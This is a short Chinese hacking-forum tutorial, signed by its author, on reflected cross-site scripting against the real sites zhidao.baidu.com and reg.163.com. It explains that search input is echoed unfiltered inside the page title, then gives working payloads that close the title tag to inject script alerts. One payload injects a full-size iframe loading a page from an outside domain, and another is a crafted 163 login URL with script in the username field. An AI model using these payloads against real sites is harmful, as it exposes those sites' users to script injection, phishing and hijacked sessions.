简单百度跨站漏洞教程

                                 制作：浪漫幽灵 qq 286201929 

                                                              520hack论坛ID 286201929

前一阵子早有很多人已经公布了漏洞，我也去看了看！今天给大家做个教程！

       教程内容：

                     演示百度跨站！

百度直接跨站：

进入http://zhidao.baidu.com,最上面是一个搜索框，在那里我们可以进行答案与问题搜索，

直接打入测试代码<script>alert(/浪漫幽灵qq26201929/)</script>, 然后搜索，没有跨站，

查看源码：!--STATUS OK-->
<html>
<head><base href="http://zhidao.baidu.com/">
<title>百度知道搜索_<script>alert(/浪漫幽灵qq26201929/)</script>      </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link href="/iknow.css" rel="stylesheet" type="text/css">

直接在title标签中出现了我们的跨站代码，没有经过任何滤，

没有效果仅仅是因为那个<title>和</title>将代码屏蔽了，

两样的原理，让它们提前结束，与是我这样构造搜索关键字：

让前面一个title提前结束即可，而后面的那个</title>因为它没有了标签的前一部分当然就不能执行了

，所以也就对我们没有过滤效果了，输入上面的关键字后我们点击搜索，跨站成功。

</title><iframe src=http://whyuxian.com/images\1.htm width=1024 height=888></iframe>

</title><script>alert(/浪漫幽灵qq26201929/)</script>

163的跨站

http://reg.163.com/logins.jsp?username=""><script>alert(/by:浪漫幽灵qq:286201929/)</script>"<"&password=1